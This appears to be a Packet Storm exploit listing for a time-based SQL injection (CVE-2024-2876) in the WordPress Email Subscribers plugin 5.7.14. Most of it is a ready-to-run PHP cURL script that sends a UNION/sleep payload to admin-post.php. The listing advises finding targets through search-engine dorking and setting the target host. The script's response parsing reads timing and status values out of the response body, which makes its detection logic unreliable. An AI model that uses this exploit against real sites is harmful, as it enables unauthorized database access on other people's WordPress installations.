Share
## https://sploitus.com/exploit?id=PACKETSTORM:216388
=============================================================================================================================================
| # Title : wordpress Email Subscribers 5.7.14 Sql Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://wordpress.org/plugins/email-subscribers/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: The Email Subscribers โ Email Marketing, Newsletters, Automation for WordPress and WooCommerce plugin for WordPress is vulnerable to SQL Injection
(Related : https://packetstorm.news/files/id/188767/ Related CVE numbers: CVE-2024-2876 ) .
[+] Payload :
[+] Set Target : line 52.
[+] Usage : php poc.php
[+] PayLoad :
<?php
// CVE-2024-2876: SQL Injection Wordpress
// Author: indoushka
// Function to perform the SQL Injection test using cURL
function test_sql_injection($hostname) {
$url = "http://{$hostname}/wp-admin/admin-post.php";
$postFields = "page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111";
$headers = [
"Host: {$hostname}",
"Content-Type: application/x-www-form-urlencoded",
];
// Initialize cURL session
$ch = curl_init();
// Set cURL options
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout set to 20 seconds
// Execute cURL and get the response
$response = curl_exec($ch);
// Check if cURL request was successful
if(curl_errno($ch)) {
echo "cURL Error: " . curl_error($ch);
} else {
// Check for response characteristics (DSL conditions)
$duration = substr($response, strpos($response, "duration") + 9, 4); // Adjust as needed based on response structure
$status_code = substr($response, strpos($response, "status_code") + 12, 3); // Adjust as needed
$header = substr($response, strpos($response, "header") + 7, 100); // Adjust based on actual response
// Conditions matching (duration, status_code, header content)
if ($duration >= 4 && $status_code == 200 && strpos($header, "application/json") !== false) {
echo "SQL Injection vulnerability found!\n";
} else {
echo "No vulnerability detected.\n";
}
}
// Close cURL session
curl_close($ch);
}
// Example usage (Replace {{Hostname}} with the target hostname)
$hostname = 'example.com'; // Change this to your target
test_sql_injection($hostname);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================